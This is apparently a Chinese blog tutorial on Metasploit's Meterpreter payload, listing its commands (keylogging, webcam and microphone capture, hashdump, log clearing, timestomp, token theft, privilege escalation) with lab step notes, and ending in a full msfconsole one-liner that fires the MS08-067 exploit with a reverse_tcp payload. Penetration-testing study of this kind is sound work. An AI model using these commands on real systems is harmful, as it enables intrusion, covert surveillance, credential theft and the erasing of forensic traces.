高级,动态,可扩展的payload

基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面

完全基于内存的dll注入式payload(不写硬盘)

注入合法系统进程并建立stager

基于stager上传和预加载dll进行扩展模块的注入(客户端api)

基于stager建立的socket连接建立加密的TLS/1.0通信隧道

利用TLS隧道进一步加载后续扩展模块(避免网络取证)

服务端使用C语言编写

客户端提供基于ruby的全特性api(支持任何语言)

meterpreter>帮助
核心命令
=============

命令描述
    ------- -----------
    ?                                                    帮助菜单
    background                                     回到当前会话
    bg                    别名为背景
    bgkill                  杀死背景meterpreter脚本
    bglist                  列出运行后台脚本
    bgrun                      在后台执行一个meterpreter脚本
    channel                显示信息或控制活动通道
    close                  关闭频道
    disable_unicode_encoding              禁用unicode字符串的编码
    enable_unicode_encoding              启用unicode字符串的编码
    exit                    终止meterpreter会话
    get_timeouts               获取当前会话超时值
    guid              获取会话GUID
    help              帮助菜单
    info              显示有关Post模块的信息
    irb                在当前会话中打开交互式Ruby shell
    load              加载一个或多个meterpreter扩展
    machine_id          获取附加到会话的计算机的MSF ID
    migrate            将服务器迁移到另一个进程
    pivot              管理数据透视侦听器
    pry              在当前会话中打开Pry调试器
    quit              终止meterpreter会话
    read              从通道读取数据
    resource               运行存储在文件中的命令
    run              执行meterpreter脚本或Post模块
    sessions            快速切换到另一个会话
    set_timeouts           设置当前会话超时值
    sleep              强制Meterpreter安静,然后重新建立会话。
    transport            更改当前的传输机制
    use              不推荐使用的别名“load”
    uuid              获取当前会话的UUID
    write              将数据写入通道

Stdapi:文件系统命令
============================

命令描述
    ------- -----------
    cat            将文件内容读入屏幕
    cd             更改目录
    checksum          检索文件的校验和
    cp            将源复制到目标
    dir            列表文件(ls的别名)
    download          下载文件或目录
    edit            编辑文件
    getlwd           打印本地工作目录
    getwd            打印工作目录
    lcd            更改本地工作目录
    lls            列出本地文件
    lpwd           打印本地工作目录
    ls            列出文件
    mkdir           制作目录
    mv            将源移动到目标
    pwd           打印工作目录
    rm               删除指定的文件
    rmdir           删除目录
    search          搜索文件
    show_mount             列出所有挂载点/逻辑驱动器
    upload                 上传文件或目录

Stdapi:网络命令
===========================

命令描述
    ------- -----------
    arp          显示主机ARP缓存
    getproxy        显示当前的代理配置
    ifconfig        显示接口
    ipconfig         显示接口
    netstat        显示网络连接
    portfwd        将本地端口转发到远程服务
    resolve        解析目标上的一组主机名
    route          查看和修改路由表

Stdapi:系统命令
=======================

命令描述
    ------- -----------
    clearev          清除事件日志
    drop_token         放弃任何活动的模拟令牌。
    execute          执行命令
    getenv                     获取一个或多个环境变量值
    getpid                      获取当前进程标识符
    getprivs              尝试启用当前进程可用的所有权限
    getsid            获取运行服务器的用户的SID
    getuid           获取服务器正在运行的用户
    kill            终止进程
    localtime           显示目标系统的本地日期和时间
    pgrep           按名称过滤进程
    pkill              按名称终止进程
    ps              列出正在运行的进程
    reboot          重新启动远程计算机
    reg            修改远程注册表并与之交互
    rev2self          在远程计算机上调用RevertToSelf()
    shell            进入系统命令shell
    shutdown         关闭远程计算机
    steal_token           尝试从目标进程中窃取模拟令牌
    suspend          暂停或恢复进程列表

sysinfo          关于远程系统的信息,例如OS

Stdapi:用户界面命令
===============================

命令描述
    ------- -----------
    enumdesktops      列出所有可访问的桌面和窗口站
    getdesktop        获取当前的meterpreter桌面
    idletime         返回远程用户空闲的秒数
    keyscan_dump      转储击键缓冲区
    keyscan_start      开始捕获击键
    keyscan_sto        停止捕获击键
    screenshot        获取交互式桌面的屏幕截图
    setdesktop        更改meterpreters当前桌面
    uictl           控制一些用户界面组件

Stdapi:网络摄像头命令
=======================

命令描述
    ------- -----------
    record_mic        从默认麦克风录制音频X秒
    webcam_chat       开始视频聊天
    webcam_list         列出网络摄像头
    webcam_snap      从指定的网络摄像头拍摄快照
    webcam_stream      播放指定网络摄像头的视频流

Stdapi:音频输出命令
=============================

命令描述
    ------- -----------
    play        播放在目标系统上播放音频文件,没有写在磁盘上

Priv:提升命令
======================

命令描述
    ------- -----------
    getsystem      尝试将您的权限提升为本地系统的权限。

Priv:密码数据库命令
================================

命令描述
    ------- -----------
    hashdump        转储SAM数据库的内容

Priv:Timestomp命令
========================

命令描述
    ------- -----------
    timestomp        操作文件MACE属性

查看系统

查看文件及文件夹

列出进程

更改文件名字

在后台运行一个进程

先查看本机文件

然后上传一个文件到目标上

使用vnc

删除所有日志

下载目标的文件

先ps 列出进程 然后migrate 7636 把自己迁移到id号为7636这个进程里面

下载hash

查看挂载了几个硬盘

搜索某个文件

arp缓存

目标操作系统空闲时间

记录麦克风(我虚拟机没有)

列出主机有几个摄像头(我虚拟机没有)

如果有的话就可以打开摄像头

python扩展---无需运行环境,在客户端运行原生python代码

load导入python扩展,写python代码即可

msfconsole -x(编写脚本时便于引用)

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.13;set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.12;set LPORT 4444;exploit"

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

kali linux之Meterpreter的更多相关文章

  1. Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter

    Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter 原文链接:http://www.xuanhun521.com/Blog/7fc11b7a-b6cb-4 ...

  2. Kali linux 2016.2 的 plyload模块之meterpreter plyload详解

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)中的payloads模块详解 当利用成功后尝试运行一个进程,它将在系统进程列表里显示,即使在木马中尝试执行系统命令, ...

  3. MetaSploit攻击实例讲解------工具Meterpreter常用功能介绍(kali linux 2016.2(rolling))(详细)

    不多说,直接上干货! 说在前面的话 注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看.给出了详细的中文 由于篇幅原因,我只使用如下较常用的命令. 这篇博客,利用下面 ...

  4. Kali Linux additional tools setup

    The steps are pretty straight forward. The only tool that might cause some confusion is SMBexec. Thi ...

  5. 如何在Kali Linux下编译Windows Exploit

    前言 微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程中你会经常遇到很多Windows的工作站和服务器.另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试 ...

  6. Kali Linux渗透基础知识整理(三):漏洞利用

    漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...

  7. KALI LINUX WEB 渗透测试视频教程—第十九课-METASPLOIT基础

    原文链接:Kali Linux Web渗透测试视频教程—第十九课-metasploit基础 文/玄魂 目录 Kali Linux Web 渗透测试视频教程—第十九课-metasploit基础..... ...

  8. kali linux 入侵window实例

    我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵win ...

  9. Kali linux 2016.2(Rolling)中的payloads模块详解

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)中的Exploits模块详解 payloads模块,也就是shellcode,就是在漏洞利用成功后所要做的事情.在M ...

随机推荐

  1. rocketmq--push消费过程

    Rocketmq消费分为push和pull两种方式,push为被动消费类型,pull为主动消费类型,push方式最终还是会从broker中pull消息.不同于pull的是,push首先要注册消费监听器 ...

  2. java实现最通俗易懂的01背包问题

    这几天一直在想背包问题,昨天还有个学长专门讲了,但是还是不是很理解,今天我终于想通了背包问题,其实只要理解了这个思路,不管用什么语言,肯定是能编出来的.下面我就来介绍一下背包问题. 1.题目描述: 有 ...

  3. 【hdu4135】【hdu2841】【hdu1695】一类通过容斥定理求区间互质的方法

    [HDU4135]Co-prime 题意 给出三个整数N,A,B.问在区间[A,B]内,与N互质的数的个数.其中N<=10^9,A,B<=10^15. 分析 容斥定理的模板题.可以通过容斥 ...

  4. EasyBuy项目总结_20180409

    一.项目技术点 1.熟练使用jsp及el和jstl表达式 el: $() jstl: 1.导包; 2.声明<%@ taglib uri=" " preffix="c ...

  5. Java多线程—JUC原子类

    根据修改的数据类型,可以将JUC包中的原子操作类可以分为4类. 1. 基本类型: AtomicInteger, AtomicLong, AtomicBoolean ;2. 数组类型: AtomicIn ...

  6. p2319 [HNOI2006]超级英雄

    传送门 分析 从1道m进行匹配,找到第一个不能继续匹配的点即可 代码 #include<iostream> #include<cstdio> #include<cstri ...

  7. Python代码规范利器Flake8

    写代码其实是需要规范的,团队中更是如此:不然 Google 也不会发布各种编码规范,耳熟能详的有Google C++ 风格指南,Google Python 风格指南,等等. 这些规范有用吗?有用也没用 ...

  8. g2o 图优化

    http://www.cnblogs.com/gaoxiang12/p/5244828.html 扩展里面csparse

  9. [SoapUI] 循环遍历某个Test Case下的所有Test Step,将Cookie传递给这些Test Step

    import com.eviware.soapui.support.types.StringToStringMap //Get cookie's value from the project leve ...

  10. 关于更新vs2017后发布的问题 命令“bower install”已退出,代码为 9009

    更新vs2017 尝试发布 出现  命令“bower install”已退出,代码为 9009 然后我点工具测试了一下nodejs 出现下图弹窗  百度了一下 没找到对策,有没有大侠知道怎么解决 解决 ...